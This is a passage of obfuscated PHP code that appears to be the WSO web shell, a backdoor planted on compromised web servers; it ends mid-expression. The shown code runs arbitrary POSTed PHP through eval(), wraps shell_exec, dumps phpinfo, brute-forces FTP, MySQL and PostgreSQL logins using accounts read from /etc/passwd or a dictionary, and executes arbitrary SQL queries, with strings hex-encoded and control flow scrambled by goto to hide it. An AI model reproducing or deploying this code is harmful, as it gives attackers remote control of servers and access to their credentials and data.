echo "\74\150\61\x3e\105\x78\x65\143\x75\164\x69\x6f\x6e\40\120\x48\120\55\143\x6f\x64\x65\x3c\57\x68\x31\x3e\x3c\144\x69\166\x20\x63\x6c\141\163\x73\x3d\143\157\x6e\x74\x65\x6e\164\x3e\x3c\146\x6f\x72\x6d\40\156\141\x6d\x65\x3d\160\146\x20\x6d\x65\x74\150\x6f\x64\75\160\x6f\x73\164\x20\157\x6e\x73\165\x62\155\x69\164\x3d\42\151\146\50\x74\x68\151\163\x2e\141\x6a\141\x78\x2e\x63\x68\145\143\x6b\145\144\51\x7b\x61\50\x27\x50\x68\x70\x27\x2c\156\x75\154\x6c\54\164\150\x69\x73\56\143\157\144\145\x2e\x76\141\154\x75\145\x29\73\x7d\x65\154\163\145\x7b\147\50\47\x50\x68\160\47\54\x6e\165\x6c\x6c\54\164\x68\x69\163\x2e\143\157\x64\x65\x2e\x76\141\x6c\x75\x65\54\47\47\x29\73\x7d\162\x65\x74\165\x72\x6e\40\146\141\154\x73\x65\x3b\42\76\x3c\164\145\x78\164\141\x72\145\x61\40\156\x61\155\x65\75\x63\x6f\144\145\40\143\x6c\141\x73\x73\x3d\142\151\x67\141\x72\145\x61\x20\151\x64\x3d\120\x68\x70\x43\x6f\144\145\76" .
(!empty($_POST["\x70\x31"])
? htmlspecialchars($_POST["\x70\x31"])
: "") .
"\74\x2f\x74\x65\x78\164\x61\162\x65\141\76\74\151\x6e\x70\165\x74\40\x74\x79\160\145\75\x73\x75\x62\155\151\164\x20\x76\x61\x6c\x75\x65\x3d\105\166\x61\x6c\40\163\x74\171\154\x65\x3d\42\x6d\x61\x72\147\151\x6e\55\x74\157\160\x3a\x35\x70\170\x22\x3e";
goto bE4Om;
t2vRD:
wsoHeader();
goto om2si;
oWPfu:
if (!empty($_POST["\x70\x31"])) {
goto uFjl_;
uFjl_:
ob_start();
goto XYFVS;
qDLEK:
echo htmlspecialchars(ob_get_clean());
goto Zre8T;
XYFVS:
eval($_POST["\160\x31"]);
goto qDLEK;
Zre8T:
}
goto wcs04;
IyHRn:
if (empty($_POST["\x61\152\141\170"]) && !empty($_POST["\160\x31"])) {
WSOsetcookie(
md5($_SERVER["\110\x54\x54\x50\x5f\110\x4f\x53\124"]) .
"\141\x6a\141\170",
0
);
}
goto t2vRD;
om2si:
if (isset($_POST["\x70\x32"]) && $_POST["\160\x32"] == "\151\156\146\157") {
goto u6Vem;
u6Vem:
echo "\x3c\150\61\76\x50\x48\120\x20\x69\156\146\x6f\74\x2f\x68\x31\76\74\144\x69\166\x20\143\x6c\x61\163\163\75\x63\x6f\156\x74\x65\x6e\x74\76\x3c\163\x74\x79\x6c\145\x3e\x2e\x70\40\x7b\x63\x6f\154\157\x72\x3a\43\x30\60\x30\73\x7d\x3c\57\163\x74\171\x6c\x65\76";
goto ClNOj;
ClNOj:
ob_start();
goto Z0UYj;
WpKFt:
$tmp = preg_replace(
[
"\x21\50\142\157\144\x79\174\x61\x3a\134\167\53\174\142\x6f\x64\x79\x2c\40\x74\144\54\x20\164\150\54\x20\x68\x31\x2c\x20\x68\x32\51\40\x7b\56\52\x7d\x21\x6d\163\151\125",
"\41\x74\144\x2c\40\164\150\x20\173\x28\x2e\52\51\x7d\x21\x6d\x73\x69\125",
"\x21\x3c\151\x6d\x67\x5b\x5e\76\x5d\x2b\76\41\x6d\163\x69\125",
],
[
"",
"\56\145\54\40\56\x76\x2c\x20\x2e\x68\x2c\40\56\x68\40\164\150\40\x7b\x24\61\x7d",
"",
],
$tmp
);
goto AiOL8;
Z0UYj:
phpinfo();
goto pDREm;
pDREm:
$tmp = ob_get_clean();
goto WpKFt;
AiOL8:
echo str_replace("\74\x68\x31", "\x3c\x68\x32", $tmp) .
"\x3c\x2f\144\x69\x76\x3e\74\x62\162\x3e";
goto xiXKW;
xiXKW:
}
goto Sz7n2;
bE4Om:
echo "\x20\74\151\156\160\165\x74\40\164\171\x70\x65\x3d\143\x68\x65\x63\x6b\x62\x6f\x78\x20\x6e\x61\155\x65\x3d\141\x6a\141\x78\x20\166\141\154\165\x65\75\x31\x20" .
($_COOKIE[
md5($_SERVER["\110\x54\124\120\x5f\110\x4f\x53\x54"]) .
"\141\152\141\170"
]
? "\x63\150\x65\x63\153\x65\x64"
: "") .
"\76\x20\163\145\156\x64\x20\165\163\151\x6e\x67\x20\x41\x4a\x41\130\x3c\x2f\x66\x6f\x72\x6d\76\74\x70\x72\145\x20\151\144\75\120\x68\x70\x4f\165\x74\160\165\x74\40\x73\164\171\x6c\145\75\42" .
(empty($_POST["\x70\x31"])
? "\144\151\x73\160\x6c\141\171\x3a\156\157\156\x65\x3b"
: "") .
"\155\x61\x72\x67\x69\x6e\55\164\x6f\x70\x3a\65\x70\170\73\42\x20\x63\x6c\x61\163\x73\x3d\155\154\x31\76";
goto oWPfu;
dfcYP:
}
goto N84uU;
jB3VR:
$default_charset = "\127\x69\156\x64\157\167\x73\55\61\62\65\x31";
goto fj9OS;
rTVjF:
function actionLogout()
{
setcookie(
md5($_SERVER["\x48\x54\124\x50\x5f\110\117\123\x54"]),
"",
time() - 3600
);
die("\142\171\x65\x21");
}
goto i6mTz;
DbGtY:
function actionBruteforce()
{
goto uMF9i;
hSv50:
if (isset($_POST["\x70\162\x6f\x74\157"])) {
goto jX4Q5;
UnBlf:
if ($_POST["\164\x79\x70\x65"] == 1) {
$temp = @file("\57\x65\164\x63\x2f\160\x61\x73\x73\x77\144");
if (is_array($temp)) {
foreach ($temp as $line) {
goto vXxXO;
zFefs:
if (@$_POST["\x72\145\166\x65\x72\163\x65"]) {
goto S2jvF;
oahSQ:
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
goto rxcry;
S2jvF:
$tmp = "";
goto oahSQ;
rxcry:
++$attempts;
goto TfDj5;
TfDj5:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$tmp
)
) {
$success++;
echo "\74\142\x3e" .
htmlspecialchars($line[0]) .
"\74\x2f\142\x3e\x3a" .
htmlspecialchars($tmp);
}
goto lNTnA;
lNTnA:
}
goto i039d;
b2CQw:
++$attempts;
goto i1_FI;
i1_FI:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$line[0]
)
) {
$success++;
echo "\74\142\x3e" .
htmlspecialchars($line[0]) .
"\74\x2f\142\x3e\72" .
htmlspecialchars($line[0]) .
"\x3c\x62\x72\76";
}
goto zFefs;
vXxXO:
$line = explode("\x3a", $line);
goto b2CQw;
i039d:
}
}
} elseif ($_POST["\164\171\x70\145"] == 2) {
$temp = @file($_POST["\x64\x69\x63\164"]);
if (is_array($temp)) {
foreach ($temp as $line) {
goto kf0wF;
NI_R6:
if (
wsoBruteForce(
$server[0],
@$server[1],
$_POST["\x6c\x6f\147\151\156"],
$line
)
) {
$success++;
echo "\74\142\76" .
htmlspecialchars($_POST["\154\x6f\x67\x69\x6e"]) .
"\x3c\57\x62\76\72" .
htmlspecialchars($line) .
"\x3c\142\162\76";
}
goto JCePy;
kf0wF:
$line = trim($line);
goto byC2k;
byC2k:
++$attempts;
goto NI_R6;
JCePy:
}
}
}
goto VERJt;
jX4Q5:
echo "\74\x68\x31\76\122\x65\x73\x75\x6c\164\x73\74\x2f\150\x31\x3e\x3c\144\x69\166\x20\x63\154\x61\x73\163\75\143\157\x6e\x74\145\156\x74\x3e\x3c\x73\x70\141\x6e\x3e\x54\171\x70\x65\x3a\74\x2f\x73\160\x61\156\x3e\40" .
htmlspecialchars($_POST["\160\162\x6f\x74\157"]) .
"\40\74\x73\160\141\x6e\76\x53\145\x72\x76\145\x72\x3a\74\57\x73\x70\141\156\x3e\40" .
htmlspecialchars($_POST["\163\x65\162\x76\x65\x72"]) .
"\x3c\x62\x72\x3e";
goto LBJl4;
VERJt:
echo "\x3c\x73\x70\141\156\76\x41\164\x74\145\155\160\164\x73\72\x3c\x2f\x73\x70\141\156\76\40{$attempts}\40\x3c\x73\x70\x61\x6e\x3e\x53\165\x63\x63\145\x73\163\72\74\57\163\x70\141\156\76\40{$success}\74\57\144\x69\166\x3e\74\142\162\x3e";
goto U2KZG;
ObcWW:
$server = explode("\72", $_POST["\x73\145\162\166\x65\x72"]);
goto UnBlf;
LBJl4:
if ($_POST["\160\x72\x6f\164\x6f"] == "\146\x74\x70") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto w1bnC;
MJhTf:
@ftp_close($fp);
goto efLYK;
efLYK:
return $res;
goto zU7bZ;
aqJAG:
$res = @ftp_login($fp, $login, $pass);
goto MJhTf;
w1bnC:
$fp = @ftp_connect($ip, $port ? $port : 21);
goto NYGOQ;
NYGOQ:
if (!$fp) {
return false;
}
goto aqJAG;
zU7bZ:
}
} elseif ($_POST["\160\x72\x6f\x74\x6f"] == "\x6d\171\163\x71\x6c") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto nwkI1;
tqKjk:
@mysqli_close($res);
goto lNvU5;
nwkI1:
$res = @mysqli_connect(
$ip . "\72" . $port ? $port : 3306,
$login,
$pass
);
goto tqKjk;
lNvU5:
return $res;
goto h_hcl;
h_hcl:
}
} elseif ($_POST["\160\162\x6f\x74\x6f"] == "\x70\147\163\161\x6c") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto ucMyA;
DgnPW:
@pg_close($res);
goto qQMP_;
qQMP_:
return $res;
goto N73qn;
ucMyA:
$str =
"\x68\x6f\x73\164\x3d\x27" .
$ip .
"\x27\40\160\x6f\162\164\75\x27" .
$port .
"\x27\x20\165\163\145\162\x3d\x27" .
$login .
"\x27\x20\160\x61\163\x73\x77\x6f\162\x64\x3d\x27" .
$pass .
"\x27\x20\144\x62\156\x61\155\x65\75\160\x6f\x73\x74\147\x72\145\163";
goto szIUy;
szIUy:
$res = @pg_connect($str);
goto DgnPW;
N73qn:
}
}
goto px18Z;
px18Z:
$success = 0;
goto aKdd5;
aKdd5:
$attempts = 0;
goto ObcWW;
U2KZG:
}
goto NNTq8;
NNTq8:
echo "\x3c\150\x31\76\x42\x72\x75\164\145\x66\x6f\162\x63\x65\74\x2f\x68\x31\76\x3c\x64\151\166\x20\143\x6c\x61\163\x73\x3d\x63\157\x6e\x74\145\156\164\x3e\74\x74\141\x62\x6c\145\x3e\74\146\157\162\x6d\40\x6d\x65\x74\150\x6f\x64\75\x70\x6f\x73\x74\x3e\74\164\162\x3e\74\x74\144\x3e\x3c\163\x70\x61\x6e\x3e\124\x79\160\145\x3c\57\163\x70\141\x6e\x3e\x3c\x2f\x74\144\x3e" .
"\74\164\x64\76\74\163\145\x6c\x65\143\164\40\x6e\x61\x6d\x65\x3d\160\x72\157\x74\x6f\76\x3c\157\160\164\151\157\156\40\166\141\x6c\165\x65\x3d\146\x74\x70\x3e\106\124\120\74\x2f\x6f\160\x74\x69\x6f\x6e\76\74\x6f\160\164\151\x6f\x6e\x20\166\x61\x6c\165\145\x3d\x6d\171\163\x71\x6c\76\115\171\x53\x71\x6c\x3c\x2f\157\x70\x74\151\157\156\x3e\x3c\x6f\160\x74\151\x6f\156\40\166\141\154\x75\x65\75\160\x67\x73\161\154\76\120\x6f\163\164\147\x72\145\123\161\x6c\74\x2f\x6f\x70\164\x69\x6f\x6e\76\x3c\x2f\x73\145\154\145\x63\x74\76\74\57\164\144\76\74\x2f\x74\x72\76\x3c\x74\162\x3e\74\164\144\76" .
"\74\151\156\160\165\164\40\x74\x79\160\145\x3d\x68\151\x64\x64\x65\x6e\x20\156\141\155\x65\75\x63\x20\166\x61\154\165\145\x3d\x22" .
htmlspecialchars($GLOBALS["\143\x77\144"]) .
"\42\76" .
"\74\151\156\x70\x75\x74\x20\x74\x79\160\x65\x3d\150\x69\x64\144\x65\x6e\x20\x6e\x61\x6d\x65\75\x61\x20\x76\141\154\165\145\x3d\x22" .
htmlspecialchars($_POST["\141"]) .
"\42\x3e" .
"\x3c\x69\156\160\165\164\40\x74\x79\160\x65\x3d\150\151\x64\x64\145\156\40\x6e\x61\155\145\x3d\143\150\x61\162\x73\x65\x74\x20\166\x61\x6c\x75\x65\75\42" .
htmlspecialchars($_POST["\143\150\141\x72\163\145\x74"]) .
"\x22\x3e" .
"\74\x73\x70\141\x6e\x3e\123\x65\162\x76\x65\162\72\160\x6f\162\x74\74\x2f\x73\160\141\156\76\x3c\x2f\x74\144\76" .
"\74\x74\144\x3e\x3c\x69\156\160\165\x74\x20\x74\171\160\145\75\164\x65\x78\x74\40\x6e\x61\155\x65\75\163\x65\x72\x76\x65\162\x20\x76\141\154\x75\145\x3d\42\61\x32\x37\56\60\x2e\60\56\x31\x22\76\x3c\57\x74\144\76\74\57\x74\162\76" .
"\x3c\164\x72\76\74\164\144\76\x3c\163\160\141\156\x3e\102\162\165\164\145\x20\164\x79\160\x65\74\x2f\163\x70\x61\x6e\76\x3c\57\164\x64\76" .
"\x3c\x74\x64\76\74\x6c\141\x62\145\x6c\76\74\x69\x6e\x70\165\164\x20\164\x79\x70\145\x3d\162\x61\144\x69\x6f\40\156\141\x6d\145\x3d\164\171\160\145\40\x76\141\154\x75\145\75\42\x31\42\x20\x63\150\145\x63\153\145\x64\76\x20\x2f\x65\164\x63\x2f\x70\141\163\163\x77\x64\x3c\x2f\154\141\142\145\x6c\x3e\x3c\x2f\x74\144\76\74\57\x74\162\76" .
"\x3c\164\162\x3e\x3c\164\144\x3e\74\x2f\x74\144\76\74\164\x64\x3e\x3c\154\x61\142\145\154\40\163\164\x79\x6c\145\x3d\42\x70\x61\x64\x64\151\x6e\147\55\x6c\x65\146\x74\72\61\x35\160\170\42\x3e\74\151\x6e\160\165\x74\40\x74\x79\160\145\x3d\x63\x68\145\x63\x6b\142\157\x78\x20\156\141\x6d\145\x3d\162\x65\x76\145\162\163\x65\40\x76\x61\154\165\145\75\61\40\x63\x68\145\143\x6b\145\x64\76\40\162\145\x76\145\162\163\145\x20\x28\x6c\157\x67\x69\156\40\55\x3e\x20\x6e\x69\147\157\x6c\x29\x3c\x2f\x6c\x61\x62\x65\x6c\76\74\57\x74\144\x3e\74\57\x74\162\x3e" .
"\x3c\164\162\x3e\x3c\164\144\x3e\74\x2f\x74\144\76\x3c\x74\x64\76\74\x6c\x61\142\145\154\76\74\x69\156\x70\165\164\40\164\x79\x70\145\x3d\162\x61\144\151\157\x20\156\x61\x6d\x65\75\x74\x79\x70\x65\40\166\x61\x6c\165\x65\75\42\x32\x22\x3e\x20\104\151\143\164\151\157\x6e\141\162\171\74\x2f\x6c\x61\x62\x65\154\76\74\x2f\x74\x64\x3e\74\x2f\x74\162\76" .
"\74\164\x72\76\74\164\144\x3e\74\x2f\164\x64\76\74\x74\144\x3e\x3c\164\141\142\x6c\x65\40\163\x74\171\154\x65\75\x22\160\141\144\x64\151\x6e\x67\x2d\154\145\x66\164\x3a\x31\65\x70\170\42\x3e\x3c\164\x72\x3e\x3c\164\x64\76\74\x73\x70\x61\156\76\114\x6f\x67\151\156\x3c\x2f\163\160\x61\156\x3e\74\x2f\164\144\76" .
"\x3c\164\144\76\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\x74\145\x78\x74\x20\x6e\x61\155\145\x3d\x6c\x6f\x67\151\x6e\40\x76\x61\x6c\x75\x65\75\x22\162\x6f\157\x74\42\x3e\74\x2f\x74\x64\76\x3c\57\x74\162\76" .
"\x3c\x74\162\76\x3c\164\144\x3e\x3c\x73\160\x61\156\76\104\151\143\164\x69\157\x6e\141\x72\171\74\57\x73\x70\141\156\76\74\57\x74\x64\x3e" .
"\x3c\164\x64\x3e\74\151\x6e\x70\x75\x74\x20\164\x79\160\145\x3d\x74\x65\170\x74\40\x6e\x61\155\145\75\x64\151\143\164\40\x76\141\x6c\x75\145\75\42" .
htmlspecialchars($GLOBALS["\143\x77\144"]) .
"\x70\x61\163\163\x77\144\56\144\x69\x63\x22\76\x3c\57\x74\x64\76\x3c\57\164\162\x3e\74\x2f\x74\x61\142\x6c\x65\x3e" .
"\x3c\57\164\144\76\74\57\164\162\76\74\164\162\x3e\74\164\x64\76\x3c\57\x74\x64\76\74\x74\144\76\x3c\151\156\x70\165\164\x20\164\x79\160\145\75\163\165\x62\155\151\x74\x20\x76\x61\x6c\165\x65\x3d\42\76\x3e\42\x3e\74\57\x74\x64\76\x3c\57\x74\162\x3e\x3c\x2f\146\x6f\x72\x6d\76\74\57\164\141\x62\154\x65\x3e";
goto HIh7o;
uMF9i:
wsoHeader();
goto hSv50;
HIh7o:
echo "\x3c\x2f\x64\x69\x76\x3e\x3c\142\x72\76";
goto wlwoF;
wlwoF:
wsoFooter();
goto p3uSI;
p3uSI:
}
goto wVO2a;
uf2tU:
$default_use_ajax = true;
goto jB3VR;
d62j5:
function wsoEx($in)
{
$out = shell_exec($in);
return $out;
}
goto yXkOt;
wVO2a:
function actionSql()
{
goto pXyEP;
WqMW0:
if (@$_POST["\x74\x79\x70\x65"] == "\x70\x67\163\x71\154") {
echo "\163\x65\154\145\143\164\145\x64";
}
goto bZFnU;
qgUXu:
echo "\74\x2f\x64\151\x76\x3e";
goto G862b;
G862b:
wsoFooter();
goto gsteZ;
bZFnU:
echo "\76\120\x6f\163\x74\x67\162\x65\123\x71\154\74\57\157\160\164\x69\157\156\76\x3c\57\163\145\154\145\143\164\76\74\57\164\x64\x3e\15\xa\74\x74\144\x3e\x3c\151\156\x70\165\x74\x20\164\x79\x70\x65\x3d\164\145\x78\164\x20\x6e\141\155\x65\75\x73\161\154\x5f\150\157\x73\x74\x20\166\x61\x6c\x75\145\x3d\42" .
(empty($_POST["\163\x71\x6c\137\x68\157\x73\164"])
? "\x6c\157\x63\x61\x6c\x68\157\163\164"
: htmlspecialchars($_POST["\163\161\154\x5f\150\157\x73\164"])) .
"\42\x3e\74\x2f\x74\144\76\xd\12\74\164\144\76\74\151\x6e\160\165\164\40\164\x79\x70\145\75\x74\x65\170\x74\40\156\x61\x6d\x65\75\163\x71\154\x5f\x6c\x6f\147\151\156\x20\x76\x61\154\165\145\75\42" .
(empty($_POST["\x73\x71\x6c\x5f\x6c\x6f\147\x69\156"])
? "\162\157\157\164"
: htmlspecialchars(
$_POST["\x73\161\154\x5f\154\x6f\x67\151\156"]
)) .
"\42\x3e\x3c\x2f\164\144\x3e\15\xa\74\164\x64\76\74\151\x6e\x70\165\164\40\164\x79\160\145\75\164\x65\170\164\x20\x6e\141\x6d\145\x3d\x73\161\x6c\137\x70\141\163\163\x20\166\141\x6c\x75\x65\x3d\42" .
(empty($_POST["\x73\161\x6c\137\160\x61\163\163"])
? ""
: htmlspecialchars($_POST["\x73\161\x6c\x5f\x70\x61\163\163"])) .
"\x22\x3e\74\x2f\x74\144\76\x3c\164\x64\76";
goto dxViD;
dxViD:
$tmp =
"\x3c\151\x6e\x70\x75\x74\x20\x74\x79\x70\145\75\164\x65\x78\164\40\x6e\141\x6d\x65\75\163\161\x6c\137\142\x61\x73\145\x20\166\141\x6c\165\x65\x3d\47\x27\x3e";
goto L_VIT;
Auorx:
echo "\74\x2f\x74\144\x3e\xd\xa\x9\11\x9\11\x3c\x74\x64\x3e\74\151\x6e\160\165\164\40\x74\x79\160\145\75\x73\x75\142\155\x69\x74\x20\x76\x61\x6c\165\145\x3d\47\76\76\x27\40\157\x6e\x63\154\x69\x63\x6b\75\47\146\x73\x28\x64\56\x73\x66\51\x3b\x27\76\x3c\x2f\x74\144\76\xd\xa\40\40\40\40\40\40\x20\40\x20\x20\40\40\40\40\x20\x20\74\164\144\76\x3c\151\156\x70\165\164\40\x74\171\160\145\x3d\143\x68\x65\143\x6b\x62\157\170\x20\x6e\141\155\145\75\x73\161\x6c\137\x63\x6f\165\156\x74\x20\x76\x61\154\165\x65\x3d\47\x6f\156\x27" .
(empty($_POST["\x73\x71\154\137\x63\x6f\165\x6e\164"])
? ""
: "\x20\143\x68\x65\143\153\145\144") .
"\76\40\143\157\165\156\164\x20\x74\x68\x65\40\x6e\x75\155\x62\x65\162\40\157\x66\40\162\157\x77\x73\x3c\57\x74\144\76\xd\xa\11\11\x9\x3c\x2f\x74\x72\x3e\xd\xa\x9\11\74\x2f\x74\x61\142\x6c\x65\76\15\12\11\x9\74\x73\x63\162\151\160\164\76\xd\12\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\163\x5f\144\142\75\47" .
@addslashes($_POST["\163\x71\x6c\x5f\x62\x61\x73\x65"]) .
"\x27\73\xd\xa\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\146\165\156\143\x74\x69\157\156\40\x66\x73\50\x66\51\40\x7b\xd\xa\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\151\146\x28\146\x2e\x73\x71\154\137\142\141\163\145\x2e\166\141\x6c\165\x65\41\x3d\x73\x5f\144\142\x29\x20\173\x20\146\56\157\156\x73\x75\142\x6d\151\x74\40\75\x20\x66\165\156\143\x74\151\x6f\x6e\x28\51\x20\x7b\x7d\73\xd\12\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\151\x66\50\146\56\x70\x31\x29\40\x66\x2e\160\61\x2e\166\141\154\165\x65\x3d\x27\47\73\xd\12\40\x20\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\151\146\x28\146\x2e\160\62\51\x20\x66\x2e\160\62\56\166\141\x6c\x75\145\x3d\47\47\x3b\xd\xa\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x69\146\x28\146\56\x70\63\x29\40\146\56\160\63\56\166\x61\x6c\165\x65\x3d\x27\x27\73\xd\xa\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\40\40\175\15\xa\40\40\40\40\40\x20\40\x20\40\40\40\40\x7d\xd\12\x9\11\x9\x66\x75\x6e\143\x74\151\x6f\156\40\x73\164\x28\x74\x2c\x6c\51\x20\173\15\xa\x9\x9\11\x9\x64\x2e\163\146\x2e\160\61\x2e\x76\x61\154\x75\145\40\75\40\47\163\145\x6c\145\x63\164\47\73\xd\12\11\x9\x9\11\144\x2e\x73\x66\x2e\x70\62\56\166\x61\154\165\145\x20\x3d\x20\x74\x3b\15\xa\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\151\146\50\x6c\x20\x26\46\x20\144\56\163\x66\56\160\63\x29\40\x64\x2e\x73\146\x2e\160\x33\56\166\141\x6c\x75\145\40\75\x20\x6c\73\xd\12\11\11\11\11\x64\56\x73\146\56\x73\x75\x62\155\x69\x74\x28\51\73\15\12\11\11\11\x7d\15\12\11\x9\x9\146\165\156\143\164\x69\157\156\x20\x69\163\50\x29\x20\173\xd\xa\11\x9\x9\11\146\157\x72\50\151\x3d\60\x3b\151\x3c\x64\56\x73\146\x2e\145\x6c\145\x6d\x65\x6e\x74\x73\x5b\x27\164\142\x6c\x5b\x5d\x27\135\56\154\x65\156\x67\164\x68\x3b\53\53\x69\x29\xd\xa\x9\x9\11\11\x9\x64\56\163\x66\56\x65\154\x65\155\x65\156\x74\163\133\47\x74\x62\x6c\133\x5d\47\x5d\x5b\x69\135\x2e\x63\150\x65\143\x6b\145\144\40\x3d\x20\x21\x64\x2e\163\x66\56\145\154\x65\155\145\x6e\x74\163\133\47\x74\142\154\133\x5d\x27\135\x5b\151\135\x2e\143\x68\145\143\x6b\x65\144\73\xd\xa\x9\x9\11\x7d\xd\xa\11\x9\x3c\57\x73\143\x72\x69\160\164\x3e";
goto omuNC;
omuNC:
if (isset($db) && $db->link) {
goto wQooQ;
v7m0f:
if (!empty($_POST["\x73\x71\154\137\x62\x61\x73\x65"])) {
goto Rgzyg;
MvXdD:
if (
@$_POST["\160\61"] == "\x71\x75\x65\162\x79" &&
!empty($_POST["\x70\62"])
) {
$db->query(@$_POST["\160\x32"]);
if ($db->res !== false) {
goto p5kAe;
FQZVM:
while ($item = $db->fetch()) {
if (!$title) {
goto UHBlV;
UHBlV:
echo "\x3c\164\162\76";
goto hcvnp;
krRoK:
$line = 2;
goto OQDWZ;
hcvnp:
foreach ($item as $key => $value) {
echo "\74\164\150\76" .
$key .
"\74\57\164\x68\76";
}
goto gYEfe;
s133J:
$title = true;
goto vdCQU;
vdCQU:
echo "\x3c\57\164\x72\x3e\x3c\x74\x72\76";
goto krRoK;
gYEfe:
reset($item);
goto s133J;
OQDWZ:
}
echo "\74\164\x72\40\x63\x6c\x61\x73\163\x3d\42\x6c" .
$line .
"\42\x3e";
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "\74\164\x64\76\x3c\151\76\156\165\154\x6c\x3c\x2f\x69\x3e\x3c\57\x74\x64\76";
} else {
echo "\74\164\x64\x3e" .
nl2br(htmlspecialchars($value)) .
"\x3c\57\164\144\x3e";
}
}
echo "\x3c\57\164\x72\76";
}
goto LonsA;
c36CC:
$line = 1;
goto FQZVM;
LonsA:
echo "\x3c\x2f\164\x61\x62\154\x65\76";
goto zCgso;
vhOW_:
echo "\x3c\164\141\x62\154\145\40\167\151\144\x74\x68\x3d\x31\x30\60\x25\x20\143\145\x6c\x6c\x73\160\x61\x63\151\x6e\x67\75\x31\x20\x63\x65\x6c\154\160\x61\x64\x64\x69\x6e\147\75\x32\x20\143\154\x61\x73\163\x3d\x6d\141\151\x6e\x20\163\x74\x79\x6c\x65\75\x22\x62\x61\143\x6b\x67\x72\157\165\156\x64\55\x63\157\x6c\x6f\162\x3a\x23\x32\71\x32\71\x32\71\42\x3e";
goto c36CC;
p5kAe:
$title = false;
goto vhOW_;
zCgso:
} else {
echo "\74\x64\x69\x76\76\x3c\x62\76\105\162\162\157\162\72\x3c\x2f\142\x3e\40" .
htmlspecialchars($db->error()) .
"\x3c\57\x64\151\x76\76";
}
}
goto f63uD;
f63uD:
echo "\74\x62\162\x3e\x3c\x2f\x66\157\x72\x6d\x3e\74\x66\157\162\x6d\40\157\x6e\x73\x75\x62\155\151\x74\75\x27\144\56\x73\146\56\160\x31\x2e\x76\141\x6c\165\145\75\x22\161\x75\x65\x72\x79\x22\73\x64\56\163\x66\56\x70\62\56\x76\x61\154\165\145\x3d\x74\x68\151\x73\x2e\161\165\x65\162\171\56\x76\x61\x6c\165\145\73\x64\157\x63\165\155\145\x6e\164\56\163\x66\x2e\x73\x75\x62\155\151\164\50\x29\x3b\x72\145\x74\x75\162\x6e\40\x66\x61\154\x73\x65\73\47\76\x3c\164\x65\x78\x74\x61\x72\x65\141\x20\x6e\141\x6d\145\75\x27\x71\x75\x65\x72\x79\47\x20\163\164\x79\x6c\x65\x3d\x27\167\151\144\164\150\x3a\x31\x30\x30\45\x3b\x68\145\x69\x67\x68\164\x3a\61\x30\60\x70\170\47\76";
goto l03yb;
Rgzyg:
$db->selectdb($_POST["\x73\161\154\137\x62\x61\163\145"]);
goto QW0Ku;
uEPKu:
if (@$_POST["\x70\x31"] == "\163\145\154\x65\x63\164") {
goto mAhBO;
IznKf:
if ($_POST["\160\63"] > 1) {
echo "\40\74\x61\40\150\x72\x65\146\75\x23\40\x6f\156\143\154\x69\143\153\75\47\x73\x74\x28\42" .
$_POST["\160\x32"] .
"\x22\54\x20" .
($_POST["\x70\x33"] - 1) .
"\x29\x27\76\x26\x6c\x74\x3b\x20\120\x72\145\166\74\57\x61\76";
}
goto ZoHo3;
l2Xna:
$pages = ceil($num["\156"] / 30);
goto ZYT4s;
mAhBO:
$_POST["\160\x31"] = "\161\x75\145\x72\171";
goto e_ZJ4;
ZYT4s:
echo "\74\x73\143\x72\x69\160\x74\x3e\144\x2e\x73\x66\x2e\157\156\163\165\x62\x6d\151\x74\75\146\x75\156\143\164\151\x6f\156\x28\51\173\163\x74\x28\x22" .
$_POST["\160\62"] .
"\x22\54\40\144\56\163\x66\56\x70\63\x2e\166\141\154\165\x65\51\175\74\x2f\163\x63\x72\x69\160\164\x3e\74\163\160\141\156\x3e" .
$_POST["\x70\x32"] .
"\74\57\163\160\141\x6e\76\x20\x28{$num["\156"]}\x20\x72\x65\x63\x6f\x72\144\x73\x29\40\120\x61\x67\x65\x20\43\x20\x3c\x69\156\160\x75\164\40\164\171\160\145\x3d\x74\145\170\x74\x20\156\141\x6d\145\x3d\47\160\x33\x27\40\x76\141\154\x75\145\x3d" .
(int) $_POST["\160\x33"] .
"\x3e";
goto uoZpe;
Es7M3:
$num = $db->fetch();
goto l2Xna;
uoZpe:
echo "\40\157\x66\40{$pages}";
goto IznKf;
rczWG:
$_POST["\x70\x33"]--;
goto bhg9h;
e_ZJ4:
$_POST["\160\63"] = $_POST["\160\x33"] ? $_POST["\160\63"] : 1;
goto Lo_J9;
nEjUO:
echo "\x3c\x62\162\x3e\74\x62\162\76";
goto IQ9di;
bhg9h:
if ($_POST["\x74\171\160\x65"] == "\160\147\163\161\x6c") {
$_POST["\160\x32"] =
"\123\x45\114\105\103\124\40\x2a\40\106\122\x4f\x4d\40" .
$_POST["\x70\62"] .
"\x20\x4c\x49\115\111\124\x20\x33\60\40\x4f\106\x46\x53\105\124\x20" .
$_POST["\160\63"] * 30;
} else {
$_POST["\160\62"] =
"\123\x45\x4c\x45\x43\124\40\52\40\x46\x52\117\115\x20\140" .
$_POST["\160\62"] .
"\x60\40\x4c\x49\115\111\x54\x20" .
$_POST["\x70\63"] * 30 .
"\x2c\63\x30";
}
goto nEjUO;
Lo_J9:
$db->query(
"\123\105\x4c\105\103\124\40\x43\117\125\x4e\x54\x28\52\51\x20\141\x73\x20\156\x20\106\122\117\115\x20" .
$_POST["\160\x32"]
);
goto Es7M3;
ZoHo3:
if ($_POST["\160\x33"] < $pages) {
echo "\x20\74\141\x20\150\162\145\146\75\43\x20\x6f\156\143\x6c\x69\x63\153\75\x27\163\x74\50\x22" .
